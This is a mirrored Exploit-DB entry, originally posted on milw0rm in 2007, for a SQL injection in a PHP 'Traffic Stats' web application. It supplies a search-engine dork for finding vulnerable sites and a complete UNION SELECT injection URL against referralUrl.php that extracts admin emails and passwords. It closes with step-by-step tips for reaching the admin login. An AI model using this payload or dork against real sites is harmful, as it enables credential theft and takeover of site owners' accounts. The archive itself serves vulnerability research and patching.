exploit-db-mirror/exploits/php/webapps/4187.txt
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

32 lines
No EOL
1.1 KiB
Text

--==+================================================================================+==--
--==+ Traffic Stats SQL Injection Vulnerbility +==--
--==+================================================================================+==--
AUTHOR: t0pP8uZz & xprog
SITE: N/A
DORK: allintext:" If you would like to contact us, our email address is" traffic
DESCRIPTION:
pull out admin email/passwords
EXPLOITS:
http://server.com/Script_Dir/referralUrl.php?offset=-1/**/UNION/**/ALL/**/SELECT/**/1,2,concat(email,0x3a,password)/**/FROM/**/StatAdmin/*
NOTE/TIP:
first you must register a account then click ad site, and add random sites, then paste injection
admin login is at /admin/ only password is needed :D
GREETZ: milw0rm.com, H4CKY0u.org, G0t-Root.net/G0t-Root.org !
--==+================================================================================+==--
--==+ Traffic Stats SQL Injection Vulnerbility +==--
--==+================================================================================+==--
# milw0rm.com [2007-07-16]